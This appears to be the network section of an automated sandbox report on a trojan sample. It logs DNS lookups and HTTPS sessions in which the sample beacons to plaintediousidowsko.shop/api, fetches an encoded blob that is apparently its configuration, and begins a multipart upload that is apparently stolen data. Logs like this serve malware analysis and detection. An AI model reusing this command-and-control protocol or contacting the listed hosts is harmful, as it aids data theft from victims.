                                              May 3, 2024 05:28:23.972378969 CEST44349717104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:23.972613096 CEST44349717104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:23.975119114 CEST49717443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:23.975291967 CEST49717443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:23.975320101 CEST44349717104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:23.975375891 CEST49717443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:23.975385904 CEST44349717104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:24.506162882 CEST44349717104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:24.506300926 CEST44349717104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:24.506361961 CEST49717443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:24.507040977 CEST49717443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:24.507065058 CEST44349717104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:24.761034966 CEST49718443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:24.761074066 CEST44349718104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:24.761140108 CEST49718443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:24.761665106 CEST49718443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:24.761676073 CEST44349718104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:24.951051950 CEST44349718104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:24.951170921 CEST49718443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:24.952609062 CEST49718443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:24.952616930 CEST44349718104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:24.952856064 CEST44349718104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:24.954085112 CEST49718443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:24.954191923 CEST49718443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:24.954216003 CEST44349718104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:25.298336983 CEST44349718104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:25.298475981 CEST44349718104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:25.298576117 CEST49718443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:25.298815966 CEST49718443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:25.298832893 CEST44349718104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:25.366642952 CEST49719443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:25.366682053 CEST44349719104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:25.366770983 CEST49719443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:25.367131948 CEST49719443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:25.367146015 CEST44349719104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:25.552681923 CEST44349719104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:25.552851915 CEST49719443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:25.554090023 CEST49719443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:25.554095984 CEST44349719104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:25.554347992 CEST44349719104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:25.555680990 CEST49719443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:25.555809021 CEST49719443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:25.555814028 CEST44349719104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.036571026 CEST44349719104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.036696911 CEST44349719104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.036767006 CEST49719443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.036974907 CEST49719443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.036993980 CEST44349719104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.495347023 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.495381117 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.495470047 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.495866060 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.495878935 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.682667971 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.682825089 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.684163094 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.684170008 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.684407949 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.685762882 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.686636925 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.686655998 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.686799049 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.686829090 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.686964989 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.687012911 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.687166929 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.687195063 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.687311888 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.687338114 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.687482119 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.687506914 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.687515974 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.687530041 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.687643051 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.687669992 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.687695980 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.687804937 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.687836885 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.728132963 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.728353024 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.728424072 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.728465080 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.772125006 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:26.772227049 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:26.820113897 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:28.310457945 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:28.310566902 CEST44349720104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:28.310640097 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:28.310889959 CEST49720443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:28.310904026 CEST44349720104.21.53.146192.168.2.6
                                              TimestampSource PortDest PortSource IPDest IP
                                              May 3, 2024 05:28:19.046937943 CEST6036953192.168.2.61.1.1.1
                                              May 3, 2024 05:28:19.144717932 CEST53603691.1.1.1192.168.2.6
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              May 3, 2024 05:28:19.046937943 CEST192.168.2.61.1.1.10x5db6Standard query (0)plaintediousidowsko.shopA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              May 3, 2024 05:28:19.144717932 CEST1.1.1.1192.168.2.60x5db6No error (0)plaintediousidowsko.shop104.21.53.146A (IP address)IN (0x0001)false
                                              May 3, 2024 05:28:19.144717932 CEST1.1.1.1192.168.2.60x5db6No error (0)plaintediousidowsko.shop172.67.213.139A (IP address)IN (0x0001)false
                                              May 3, 2024 05:28:33.758207083 CEST1.1.1.1192.168.2.60x356No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              May 3, 2024 05:28:33.758207083 CEST1.1.1.1192.168.2.60x356No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                              May 3, 2024 05:28:34.451699018 CEST1.1.1.1192.168.2.60xea84No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                              May 3, 2024 05:28:34.451699018 CEST1.1.1.1192.168.2.60xea84No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                              • plaintediousidowsko.shop
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.649712104.21.53.1464435156C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-03 03:28:19 UTC271OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 8
                                              Host: plaintediousidowsko.shop
                                              2024-05-03 03:28:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                              Data Ascii: act=life
                                              2024-05-03 03:28:20 UTC814INHTTP/1.1 200 OK
                                              Date: Fri, 03 May 2024 03:28:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=phet18voo432ilifrt3j839dlm; expires=Mon, 26-Aug-2024 21:14:59 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CRHiDL%2FZ0d9%2BIMqwAJthot6b9fxc58Y0u%2FYutKbHrsoV1%2BnxpBzheWDTJsoDwUocWxxfpSyS%2B5CsR11ZRorrxQbAVrZ6LlLhV8SKfg9YBQz3cM4FRKbHgwOkVNMF7zyTIgSGpFeFnK60p1M%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 87dd290c09ee7c78-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-03 03:28:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                              Data Ascii: 2ok
                                              2024-05-03 03:28:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.649713104.21.53.1464435156C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-03 03:28:20 UTC272OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 49
                                              Host: plaintediousidowsko.shop
                                              2024-05-03 03:28:20 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 39 4f 4f 52 34 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                              Data Ascii: act=recive_message&ver=4.0&lid=Z9OOR4--&j=default
                                              2024-05-03 03:28:20 UTC808INHTTP/1.1 200 OK
                                              Date: Fri, 03 May 2024 03:28:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=kdlj2rkuf78d3t39ane9qfec31; expires=Mon, 26-Aug-2024 21:14:59 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PZNUoPiJeCCBIpX25h6ExCt1YzEx1nWB5gphHzUJ5Lt0HnbsYXzLod31DAc%2BCWMwgn3UVbkVm1LGI4x6UpDYCsiVWY%2FODHR7OcSqxxnNp10UbbLNPQy6FAM4Ti6F52UpQKUxmcxtESITPUk%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 87dd2910fc03422e-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-03 03:28:20 UTC561INData Raw: 35 30 30 0d 0a 43 71 41 4d 44 55 4f 4c 75 55 62 6c 46 4e 37 45 31 4e 53 30 54 67 57 2f 71 2f 65 67 52 4c 36 7a 52 55 75 6f 6e 75 57 64 4c 67 64 78 71 67 55 76 4e 61 6d 44 5a 74 45 34 31 4d 33 32 70 39 46 73 50 35 2f 66 68 64 55 68 6b 72 6c 4d 61 63 6e 36 78 36 63 4f 59 57 76 4d 66 32 68 76 67 62 42 6b 69 47 7a 38 2f 76 53 50 76 6b 64 2b 74 61 4c 2b 67 69 48 51 6b 58 39 72 69 75 6d 41 2f 30 74 2f 66 73 56 69 66 69 72 6b 31 77 61 49 63 61 71 6c 75 62 58 48 4a 53 76 57 78 4e 57 4d 54 72 65 36 5a 79 37 53 76 4e 2b 39 44 45 70 76 31 47 31 41 49 76 6a 53 5a 4d 6b 65 31 38 33 32 73 63 42 73 50 35 2b 4a 71 34 49 30 33 38 45 6b 4a 74 76 43 78 36 64 56 57 79 6a 4a 65 47 67 78 36 73 30 76 69 6e 71 74 6d 50 62 75 67 6e 34 31 6a 35 76 48 33 57 61 30 75 6a 68 42 6f 63
                                              Data Ascii: 500CqAMDUOLuUblFN7E1NS0TgW/q/egRL6zRUuonuWdLgdxqgUvNamDZtE41M32p9FsP5/fhdUhkrlMacn6x6cOYWvMf2hvgbBkiGz8/vSPvkd+taL+giHQkX9riumA/0t/fsVifirk1waIcaqlubXHJSvWxNWMTre6Zy7SvN+9DEpv1G1AIvjSZMke1832scBsP5+Jq4I038EkJtvCx6dVWyjJeGgx6s0vinqtmPbugn41j5vH3Wa0ujhBoc
                                              2024-05-03 03:28:20 UTC726INData Raw: 67 6a 59 74 59 65 2f 56 4a 59 70 32 72 71 36 39 76 64 4d 2b 62 4e 54 45 6d 4d 49 72 31 74 34 6b 4b 63 33 32 6a 66 42 47 59 57 58 50 61 47 38 68 71 5a 56 4d 37 42 33 38 6f 61 37 32 6a 6d 34 6e 2f 73 79 46 78 53 72 4b 6b 78 31 70 6f 70 65 59 73 53 63 6e 4b 71 6f 46 64 6b 6d 43 73 47 53 41 65 76 7a 2b 39 50 62 65 4b 57 54 65 77 70 72 42 4c 74 66 44 4a 7a 76 4d 38 59 4c 74 53 6d 42 6d 79 47 31 39 4b 2b 66 64 4a 34 35 39 74 61 4f 78 73 70 5a 69 44 37 61 69 31 63 55 2b 6e 49 6c 6c 61 65 76 78 6a 50 4e 47 63 6d 69 43 42 67 51 2b 70 37 4e 50 6e 68 37 58 7a 66 61 78 32 6d 77 2f 6e 34 6d 52 77 79 4c 64 31 53 6b 6e 7a 76 43 42 38 55 46 71 62 73 68 75 61 43 76 68 30 79 57 4b 66 62 4f 6d 73 37 76 53 4b 6d 76 63 7a 4e 57 4d 54 72 65 36 5a 79 37 53 76 4e 2b 39 44 45 74
                                              Data Ascii: gjYtYe/VJYp2rq69vdM+bNTEmMIr1t4kKc32jfBGYWXPaG8hqZVM7B38oa72jm4n/syFxSrKkx1popeYsScnKqoFdkmCsGSAevz+9PbeKWTewprBLtfDJzvM8YLtSmBmyG19K+fdJ459taOxspZiD7ai1cU+nIllaevxjPNGcmiCBgQ+p7NPnh7Xzfax2mw/n4mRwyLd1SknzvCB8UFqbshuaCvh0yWKfbOms7vSKmvczNWMTre6Zy7SvN+9DEt
                                              2024-05-03 03:28:20 UTC1369INData Raw: 33 38 62 34 0d 0a 5a 64 52 70 4c 30 6d 43 78 47 72 76 48 61 58 4f 33 64 32 57 4b 32 75 64 6b 64 65 43 49 4e 44 55 4b 43 66 4b 38 6f 62 79 53 6d 46 6c 77 6e 78 70 4d 2b 37 61 4a 34 52 77 75 61 4b 32 74 39 4d 70 59 39 58 4e 6d 63 31 6d 6b 72 6c 4d 51 6f 72 37 6e 37 38 55 4a 79 6a 74 65 57 45 33 34 73 38 6a 6c 32 65 47 35 49 4f 31 32 43 4a 67 79 34 6e 39 71 54 6d 53 75 55 77 77 6f 70 66 73 76 30 74 70 4b 4a 6f 73 4c 79 6a 37 79 53 43 42 66 62 65 30 70 4c 7a 53 4c 57 62 61 78 70 54 4a 49 39 44 62 4c 43 33 59 39 49 37 38 58 6d 46 6f 79 57 52 70 59 61 65 7a 54 2b 77 32 75 37 37 32 37 70 52 73 51 39 44 5a 6d 63 6b 77 32 38 45 53 4b 73 54 79 67 4f 6b 4d 44 51 50 64 49 41 64 4b 38 4c 4e 50 37 44 61 37 71 76 62 75 6c 47 78 6f 30 73 61 64 77 69 66 59 33 43 4d 6f 78
                                              Data Ascii: 38b4ZdRpL0mCxGrvHaXO3d2WK2udkdeCINDUKCfK8obySmFlwnxpM+7aJ4RwuaK2t9MpY9XNmc1mkrlMQor7n78UJyjteWE34s8jl2eG5IO12CJgy4n9qTmSuUwwopfsv0tpKJosLyj7ySCBfbe0pLzSLWbaxpTJI9DbLC3Y9I78XmFoyWRpYaezT+w2u7727pRsQ9DZmckw28ESKsTygOkMDQPdIAdK8LNP7Da7qvbulGxo0sadwifY3CMox
                                              2024-05-03 03:28:20 UTC1369INData Raw: 4c 66 53 69 61 4c 43 38 52 35 4e 63 76 69 7a 53 4a 70 62 69 34 30 54 6f 6e 74 61 4b 4b 6a 45 36 33 79 45 39 43 6f 62 79 41 38 77 77 39 4b 6f 4a 68 62 69 7a 6a 30 43 71 4c 64 37 79 69 74 62 7a 57 49 32 4c 62 77 5a 7a 43 4e 4e 76 65 4a 69 6a 42 39 34 72 78 53 57 52 74 78 53 34 68 53 59 4b 77 5a 49 42 75 2f 50 37 30 39 76 73 46 58 5a 32 68 2f 74 31 6f 74 4c 6f 2b 51 61 47 58 78 2f 68 41 4a 54 43 41 4c 6d 73 72 36 64 59 75 6a 48 6d 2f 6f 62 69 32 32 79 5a 31 31 63 6d 56 7a 43 44 64 33 53 49 6f 78 76 2b 56 38 30 70 6f 62 73 70 38 4c 32 2b 42 73 45 2f 48 63 61 54 6d 37 76 53 57 44 47 7a 52 79 70 6e 44 49 5a 37 77 4c 53 72 42 38 4d 58 4b 54 32 74 6d 78 58 67 76 53 59 4c 45 61 75 38 64 70 63 37 64 33 5a 59 72 61 35 32 52 31 34 49 69 32 4e 30 6e 4c 73 54 34 67 66
                                              Data Ascii: LfSiaLC8R5NcvizSJpbi40TontaKKjE63yE9CobyA8ww9KoJhbizj0CqLd7yitbzWI2LbwZzCNNveJijB94rxSWRtxS4hSYKwZIBu/P709vsFXZ2h/t1otLo+QaGXx/hAJTCALmsr6dYujHm/obi22yZ11cmVzCDd3SIoxv+V80pobsp8L2+BsE/HcaTm7vSWDGzRypnDIZ7wLSrB8MXKT2tmxXgvSYLEau8dpc7d3ZYra52R14Ii2N0nLsT4gf
                                              2024-05-03 03:28:20 UTC1369INData Raw: 79 57 70 6a 4b 4f 7a 64 4a 59 4a 7a 76 61 4b 36 76 4e 41 76 5a 4e 4c 47 6d 73 70 6d 6b 72 6c 4d 51 6f 72 37 6e 37 38 55 4a 79 6a 6e 65 57 51 76 37 35 74 4d 37 47 6e 79 7a 74 32 76 76 6b 63 4d 6e 63 36 5a 67 6e 36 65 6b 53 73 67 7a 50 71 43 38 30 31 6a 59 4d 64 6d 61 79 44 76 33 53 65 49 63 72 6d 6e 75 62 4c 61 49 6d 33 63 79 4a 6e 4a 4b 64 66 55 5a 32 65 69 6c 2b 79 2f 53 33 30 6f 6d 69 77 76 45 4f 72 4e 4d 35 64 36 2f 4d 37 64 71 5a 68 45 44 4d 53 68 2f 71 6c 6d 32 39 31 6e 63 59 69 38 68 75 31 47 62 32 62 48 59 57 6f 69 35 74 77 70 67 58 71 32 72 37 36 77 32 53 56 31 33 73 57 62 78 53 6a 51 33 79 6f 6a 79 66 48 48 73 53 51 4f 41 34 4a 70 64 32 47 78 6d 57 53 72 63 62 47 49 76 62 72 52 62 41 2b 32 31 74 75 71 54 63 57 35 54 45 4b 4b 2b 34 75 2f 46 43 63
                                              Data Ascii: yWpjKOzdJYJzvaK6vNAvZNLGmspmkrlMQor7n78UJyjneWQv75tM7Gnyzt2vvkcMnc6Zgn6ekSsgzPqC801jYMdmayDv3SeIcrmnubLaIm3cyJnJKdfUZ2eil+y/S30omiwvEOrNM5d6/M7dqZhEDMSh/qlm291ncYi8hu1Gb2bHYWoi5twpgXq2r76w2SV13sWbxSjQ3yojyfHHsSQOA4Jpd2GxmWSrcbGIvbrRbA+21tuqTcW5TEKK+4u/FCc
                                              2024-05-03 03:28:20 UTC1369INData Raw: 79 33 73 30 79 47 47 66 72 61 75 75 62 6e 45 4c 57 6a 55 7a 70 37 50 4b 64 4c 55 4b 54 76 4e 39 34 7a 33 52 57 74 75 67 69 41 48 53 6f 4b 62 49 35 38 32 35 4f 54 32 67 4e 55 69 62 4d 7a 47 6c 73 35 6d 74 4c 6f 34 5a 36 4b 58 6e 70 63 6e 44 69 6a 46 59 69 39 35 71 35 73 6f 69 58 61 7a 71 72 71 39 33 69 31 72 30 38 36 51 79 79 37 55 77 79 59 74 77 76 32 4a 38 45 31 68 62 63 64 71 61 43 58 76 31 47 54 4a 48 74 66 4e 39 72 48 4f 62 44 2b 66 69 62 72 46 4d 2f 33 72 5a 30 47 68 34 38 6d 58 4a 33 77 41 71 51 55 76 4a 75 57 62 66 4d 55 32 74 71 32 79 74 64 49 70 61 4e 7a 49 6b 39 41 68 31 63 4d 70 4a 4d 58 30 6a 2f 5a 4e 59 57 33 50 61 47 4d 72 36 4e 77 71 69 58 37 38 36 4e 37 64 76 57 78 67 78 59 6e 4e 67 47 62 39 77 54 77 37 33 50 47 6d 38 6b 4d 6c 41 4b 6c 78
                                              Data Ascii: y3s0yGGfrauubnELWjUzp7PKdLUKTvN94z3RWtugiAHSoKbI5825OT2gNUibMzGls5mtLo4Z6KXnpcnDijFYi95q5soiXazqrq93i1r086Qyy7UwyYtwv2J8E1hbcdqaCXv1GTJHtfN9rHObD+fibrFM/3rZ0Gh48mXJ3wAqQUvJuWbfMU2tq2ytdIpaNzIk9Ah1cMpJMX0j/ZNYW3PaGMr6NwqiX786N7dvWxgxYnNgGb9wTw73PGm8kMlAKlx
                                              2024-05-03 03:28:20 UTC1369INData Raw: 73 76 6a 33 6d 75 6f 37 2b 2b 30 69 56 6e 32 63 4f 59 78 53 62 5a 33 43 49 74 78 50 69 41 2f 30 42 71 62 38 70 68 61 79 48 6d 6d 32 72 76 48 64 66 6d 73 61 36 57 64 43 57 64 36 5a 37 55 42 39 4c 61 4e 57 6d 69 6c 35 69 78 4a 41 35 78 71 67 55 45 59 65 37 58 5a 4e 38 30 2f 4b 69 2f 74 39 34 69 61 39 58 4e 68 38 49 74 31 64 34 6d 4a 73 72 2f 68 76 56 45 64 32 37 43 5a 57 63 6d 34 64 38 71 6c 58 65 7a 35 76 6a 65 76 55 63 6e 32 74 48 56 6d 6d 53 63 34 44 45 75 7a 66 50 46 31 6b 74 2b 61 63 68 74 5a 43 32 70 73 30 2b 59 4f 4e 54 4e 72 39 36 39 52 79 66 61 78 64 57 61 5a 4a 7a 63 4b 79 54 4f 37 6f 76 2f 54 47 78 76 79 48 78 67 4c 75 54 59 4a 49 4a 6b 76 62 53 35 76 64 4d 76 59 39 4c 47 6d 63 6f 73 6e 4a 39 50 51 71 47 38 67 4f 63 4d 50 53 71 43 51 6d 77 77 34
                                              Data Ascii: svj3muo7++0iVn2cOYxSbZ3CItxPiA/0Bqb8phayHmm2rvHdfmsa6WdCWd6Z7UB9LaNWmil5ixJA5xqgUEYe7XZN80/Ki/t94ia9XNh8It1d4mJsr/hvVEd27CZWcm4d8qlXez5vjevUcn2tHVmmSc4DEuzfPF1kt+achtZC2ps0+YONTNr969RyfaxdWaZJzcKyTO7ov/TGxvyHxgLuTYJIJkvbS5vdMvY9LGmcosnJ9PQqG8gOcMPSqCQmww4
                                              2024-05-03 03:28:20 UTC1369INData Raw: 65 31 38 33 32 73 63 35 73 50 35 2b 4a 74 74 55 77 31 73 70 6e 51 61 48 6a 79 5a 63 6e 66 41 43 70 42 53 38 6d 35 5a 74 38 78 54 61 78 6f 62 69 2b 30 43 4a 68 7a 38 57 61 78 43 62 64 32 79 6f 6c 77 66 75 4a 39 45 70 67 5a 63 4a 6f 61 53 58 74 33 79 71 45 4e 76 4c 4f 33 64 32 57 4b 33 2b 64 6b 64 65 43 41 66 48 67 5a 51 72 64 36 6f 33 34 51 48 4e 6a 77 32 31 35 4c 50 6d 62 54 4f 78 70 38 73 37 64 72 37 35 48 44 4a 33 4f 6d 59 4a 2b 6e 70 45 73 4a 38 2f 39 69 2f 56 4c 61 33 72 44 5a 47 4d 67 37 74 77 76 6c 58 32 75 72 62 36 31 32 43 52 75 33 63 65 56 77 79 76 63 6b 57 6c 42 6f 5a 66 48 2b 46 51 6c 4d 49 41 75 53 67 4c 2b 7a 53 37 46 56 61 75 77 76 4c 48 61 4f 6d 7a 63 79 6f 50 50 4e 70 79 35 54 44 61 45 6c 4f 7a 6d 4a 41 34 44 67 6d 6c 6a 59 62 47 5a 5a 49
                                              Data Ascii: e1832sc5sP5+JttUw1spnQaHjyZcnfACpBS8m5Zt8xTaxobi+0CJhz8WaxCbd2yolwfuJ9EpgZcJoaSXt3yqENvLO3d2WK3+dkdeCAfHgZQrd6o34QHNjw215LPmbTOxp8s7dr75HDJ3OmYJ+npEsJ8/9i/VLa3rDZGMg7twvlX2urb612CRu3ceVwyvckWlBoZfH+FQlMIAuSgL+zS7FVauwvLHaOmzcyoPPNpy5TDaElOzmJA4DgmljYbGZZI
                                              2024-05-03 03:28:20 UTC1369INData Raw: 39 75 36 55 66 43 6d 31 6f 76 36 43 49 73 32 52 66 32 75 61 72 74 79 71 48 7a 49 34 6b 41 59 45 50 71 65 7a 54 35 34 65 31 38 33 32 6f 4a 5a 30 4a 59 2b 48 2f 61 6c 4e 6e 4d 4e 6e 63 59 69 38 77 50 46 42 5a 47 76 4d 62 58 30 7a 37 39 67 79 68 44 47 43 6d 4a 65 37 33 53 42 71 30 73 4b 72 2f 41 66 52 32 69 73 6b 78 66 65 35 77 56 6c 6d 5a 73 78 70 65 54 43 70 6c 55 7a 73 48 66 79 70 39 75 36 55 46 53 65 56 69 61 71 4d 54 72 65 36 5a 7a 47 4b 70 4d 57 2f 65 57 5a 6d 7a 47 6c 35 4d 4b 54 36 4b 59 78 36 73 61 6d 39 39 70 68 45 44 4c 61 4a 6b 34 4a 2b 6e 6f 46 70 51 61 47 58 78 2f 74 64 4a 54 43 41 50 6a 31 36 76 49 68 7a 31 79 54 55 7a 61 6e 34 76 6b 64 2b 74 61 4c 2b 67 6a 43 63 69 57 56 37 68 4a 54 73 6c 41 78 33 4b 4a 6f 73 4c 32 62 71 79 54 61 42 64 61 71
                                              Data Ascii: 9u6UfCm1ov6CIs2Rf2uartyqHzI4kAYEPqezT54e1832oJZ0JY+H/alNnMNncYi8wPFBZGvMbX0z79gyhDGCmJe73SBq0sKr/AfR2iskxfe5wVlmZsxpeTCplUzsHfyp9u6UFSeViaqMTre6ZzGKpMW/eWZmzGl5MKT6KYx6sam99phEDLaJk4J+noFpQaGXx/tdJTCAPj16vIhz1yTUzan4vkd+taL+gjCciWV7hJTslAx3KJosL2bqyTaBdaq


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.649714104.21.53.1464435156C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-03 03:28:21 UTC290OUTPOST /api HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Content-Length: 12854
                                              Host: plaintediousidowsko.shop
